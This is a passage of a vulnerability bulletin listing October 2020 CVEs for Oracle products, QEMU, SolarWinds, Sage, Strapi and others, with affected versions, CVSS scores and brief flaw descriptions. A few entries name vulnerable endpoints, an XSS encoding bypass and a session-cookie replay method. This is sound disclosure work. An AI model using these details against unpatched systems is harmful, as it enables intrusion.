Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). 2020-10-21 not yet calculated CVE-2020-14796
CONFIRM
MISC
oracle — mysql

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 not yet calculated CVE-2020-14838
CONFIRM
MISC
oracle — mysql

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: X Plugin). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14870
CONFIRM
MISC
oracle — mysql

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14867
CONFIRM
MISC
oracle — mysql

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Logging). Supported versions that are affected are 8.0.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14873
CONFIRM
MISC
oracle — mysql

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14866
CONFIRM
MISC
oracle — mysql

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14769
CONFIRM
MISC
oracle — mysql

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14869
CONFIRM
MISC
oracle — mysql

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14868
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14773
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Charsets). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14852
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14775
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14800
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14776
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14777
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Locking). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14812
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with access to the physical communication segment attached to the hardware where the MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.1 Base Score 8.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 not yet calculated CVE-2020-14878
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.2 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L). 2020-10-21 not yet calculated CVE-2020-14771
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14672
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14861
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Cluster product of Oracle MySQL (component: Cluster: NDBCluster Plugin). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Cluster. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Cluster accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Cluster. CVSS 3.1 Base Score 4.6 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L). 2020-10-21 not yet calculated CVE-2020-14853
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: FTS). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14765
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Roles). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14860
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14785
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14845
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14839
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14837
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14836
CONFIRM
MISC
oracle — peoplesoft_enterprise_global_payroll_core
 
Vulnerability in the PeopleSoft Enterprise HCM Global Payroll Core product of Oracle PeopleSoft (component: Security). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise HCM Global Payroll Core. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise HCM Global Payroll Core accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise HCM Global Payroll Core accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of PeopleSoft Enterprise HCM Global Payroll Core. CVSS 3.1 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L). 2020-10-21 not yet calculated CVE-2020-14778
MISC
oracle — peoplesoft_enterprise_peopletools
 
Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Query). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 not yet calculated CVE-2020-14847
MISC
oracle — vm_virtualbox
 
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H). 2020-10-21 not yet calculated CVE-2020-14872
MISC
oracle — vm_virtualbox
 
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N). 2020-10-21 not yet calculated CVE-2020-14881
MISC
MISC
oracle — vm_virtualbox
 
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N). 2020-10-21 not yet calculated CVE-2020-14885
MISC
MISC
oracle — vm_virtualbox
 
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N). 2020-10-21 not yet calculated CVE-2020-14884
MISC
MISC
oracle — weblogic_server
 
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 not yet calculated CVE-2020-14883
MISC
oracle — weblogic_server
 
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 not yet calculated CVE-2020-14882
MISC
oracle — solaris
 
Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). 2020-10-21 not yet calculated CVE-2020-14871
MISC
overwolf — overwolf
 
In the client in Overwolf 0.149.2.30, a channel can be accessed or influenced by an actor that is not an endpoint. 2020-10-16 not yet calculated CVE-2020-25214
MISC
parse_server — parse_server
 
Parse Server (npm package parse-server) broadcasts events to all clients without checking if the session token is valid. This allows clients with expired sessions to still receive subscription objects. It is not possible to create subscription objects with invalid session tokens. The issue is not patched. 2020-10-22 not yet calculated CVE-2020-15270
MISC
CONFIRM
MISC
phpredisadmin — N/A
 
phpRedisAdmin before 1.13.2 allows XSS via the login.php username parameter. 2020-10-16 not yet calculated CVE-2020-27163
MISC
python — python
 
In Python 3 through 3.9.0, the Lib/test/multibytecodec_support.py CJK codec tests call eval() on content retrieved via HTTP. 2020-10-22 not yet calculated CVE-2020-27619
MISC
MISC
MISC
MISC
MISC
MISC
qemu — qemu
 
An issue was discovered in QEMU through 5.1.0. An out-of-bounds memory access was found in the ATI VGA device implementation. This flaw occurs in the ati_2d_blt() routine in hw/display/ati_2d.c while handling MMIO write operations through the ati_mm_write() callback. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service. 2020-10-16 not yet calculated CVE-2020-24352
MISC
MISC
rconfig — rconfig
 
rConfig 3.9.4 and earlier allows authenticated code execution (of system commands) by sending a forged GET request to lib/ajaxHandlers/ajaxAddTemplate.php or lib/ajaxHandlers/ajaxEditTemplate.php. 2020-10-19 not yet calculated CVE-2020-13778
MISC
MISC
reason — s20_ethernet_switch
 
The affected Reason S20 Ethernet Switch is vulnerable to cross-site scripting (XSS), which may allow attackers to trick users into following a link or navigating to a page that posts a malicious JavaScript statement to the vulnerable site, causing the malicious JavaScript to be rendered by the site and executed by the victim client. 2020-10-20 not yet calculated CVE-2020-16246
MISC
red_hat — fabric8-maven-plugin
 
A flaw was found in the fabric8-maven-plugin 4.0.0 and later. When using a wildfly-swarm or thorntail custom configuration, a malicious YAML configuration file on the local machine executing the maven plug-in could allow for deserialization of untrusted data resulting in arbitrary code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 2020-10-22 not yet calculated CVE-2020-10721
MISC
rockwell_automation — allen-bradley_flex_io_1794-aent/b_4.003
 
An exploitable denial of service vulnerability exists in the ENIP Request Path Logical Segment functionality of Allen-Bradley Flex IO 1794-AENT/B 4.003. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability by sending an Electronic Key Segment with fewer bytes than required by the Key Format Table. 2020-10-19 not yet calculated CVE-2020-6084
MISC
rockwell_automation — allen-bradley_flex_io_1794-aent/b_4.003
 
An exploitable denial of service vulnerability exists in the ENIP Request Path Logical Segment functionality of Allen-Bradley Flex IO 1794-AENT/B 4.003. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability by sending an Electronic Key Segment with fewer than 0x18 bytes following the Key Format field. 2020-10-19 not yet calculated CVE-2020-6085
MISC
sage — dpw_2020_06_x
 
An issue was discovered in Sage DPW 2020_06_x before 2020_06_002. It allows unauthenticated users to upload JavaScript (in a file) via the expenses claiming functionality. However, to view the file, authentication is required. By exploiting this vulnerability, an attacker can persistently include arbitrary HTML or JavaScript code into the affected web page. The vulnerability can be used to change the contents of the displayed site, redirect to other sites, or steal user credentials. Additionally, users are potential victims of browser exploits and JavaScript malware. 2020-10-16 not yet calculated CVE-2020-26583
MISC
MISC
MISC
sage — dpw_2020_06_x
 
An issue was discovered in Sage DPW 2020_06_x before 2020_06_002. The search field “Kurs suchen” on the page Kurskatalog is vulnerable to Reflected XSS. If the attacker can lure a user into clicking a crafted link, he can execute arbitrary JavaScript code in the user’s browser. The vulnerability can be used to change the contents of the displayed site, redirect to other sites, or steal user credentials. Additionally, users are potential victims of browser exploits and JavaScript malware. 2020-10-16 not yet calculated CVE-2020-26584
MISC
MISC
MISC
sage — easypay
 
Multiple stored cross-site scripting (XSS) vulnerabilities in Sage EasyPay 10.7.5.10 allow authenticated attackers to inject arbitrary web script or HTML via multiple parameters through Unicode Transformations (Best-fit Mapping), as demonstrated by the full-width variants of the less-than sign (%EF%BC%9C) and greater-than sign (%EF%BC%9E). 2020-10-18 not yet calculated CVE-2020-13893
MISC
MISC
sap — solution_manager_and_focused_run
 
SAP Solution Manager and SAP Focused Run (update provided in WILY_INTRO_ENTERPRISE 9.7, 10.1, 10.5, 10.7) allow unauthenticated attackers to bypass authentication if the default passwords for Admin and Guest have not been changed by the administrator. This may impact the confidentiality of the service. 2020-10-20 not yet calculated CVE-2020-6369
MISC
MISC
simple — download_monitor
 
SQL injection vulnerability in Simple Download Monitor 3.8.8 and earlier allows remote attackers to execute arbitrary SQL commands via a specially crafted URL. 2020-10-21 not yet calculated CVE-2020-5651
MISC
MISC
simple — download_monitor
 
Cross-site scripting vulnerability in Simple Download Monitor 3.8.8 and earlier allows remote attackers to inject an arbitrary script via unspecified vectors. 2020-10-21 not yet calculated CVE-2020-5650
MISC
MISC
solarwinds — n-central
 
SolarWinds N-Central version 12.3 GA and lower does not set the JSESSIONID attribute to HTTPOnly. This makes it possible to influence the cookie with JavaScript. An attacker could extract the JSESSIONID by sending the user to a prepared webpage or by influencing JavaScript. This could then be forwarded to the attacker. 2020-10-19 not yet calculated CVE-2020-15910
MISC
MISC
solarwinds — n-central
 
SolarWinds N-central through 2020.1 allows session hijacking and requires user interaction or physical access. The N-Central JSESSIONID cookie attribute is not checked against multiple sources such as sourceip, MFA claim, etc. as long as the victim stays logged in within N-Central. To take advantage of this, a cookie could be stolen and the JSESSIONID captured. On its own this is not a surprising result; low-security tools allow the cookie to roam from machine to machine. The JSESSIONID cookie can then be used on the attacker's workstation by browsing to the victim's N-Central server URL and replacing the JSESSIONID attribute value with the captured value. Expected behavior would be to check this against a second source and enforce at least a reauthentication or multi-factor request, as N-Central is a highly privileged service. 2020-10-19 not yet calculated CVE-2020-15909
MISC
MISC
sprecher — sprecon-e_firmware
 
Sprecher SPRECON-E firmware prior to 8.64b might allow local attackers with access to engineering data to insert arbitrary code. This firmware lacks the validation of the input values on the device side, which is provided by the engineering software during parameterization. Attackers with access to local configuration files can therefore insert malicious commands that are executed after compiling them to valid parameter files (“PDLs”), transferring them to the device, and restarting the device. 2020-10-19 not yet calculated CVE-2020-11496
CONFIRM
spree — spree
 
In Spree before versions 3.7.11, 4.0.4, or 4.1.11, expired user tokens could be used to access Storefront API v2 endpoints. The issue is patched in versions 3.7.11, 4.0.4 and 4.1.11. A workaround without upgrading is described in the linked advisory. 2020-10-20 not yet calculated CVE-2020-15269
MISC
CONFIRM
strapi — strapi
 
admin/src/containers/InputModalStepperProvider/index.js in Strapi before 3.2.5 has unwanted /proxy?url= functionality. 2020-10-22 not yet calculated CVE-2020-27664
MISC
MISC
strapi — strapi
 
In Strapi before 3.2.5, there is no admin::hasPermissions restriction for CTB (aka content-type-builder) routes. 2020-10-22 not yet calculated CVE-2020-27665
MISC
MISC
strapi — strapi
 
Strapi before 3.2.5 has stored XSS in the wysiwyg editor’s preview feature. 2020-10-22 not yet calculated CVE-2020-27666
MISC
MISC
sylius — sylius
 
